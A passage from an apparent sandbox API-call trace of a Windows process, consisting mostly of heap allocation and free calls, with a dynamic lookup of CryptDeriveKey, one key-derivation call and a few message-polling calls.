Size=0x4) returned 0x43e2a70 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0129.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cae98 [0129.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.784] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0129.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0129.784] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0129.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0129.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0129.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0129.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0129.788] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0129.788] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0129.788] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.788] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0129.789] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0129.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0129.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf28 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0129.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf70 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafb8 [0129.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0129.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0129.790] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0129.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0129.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0129.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) 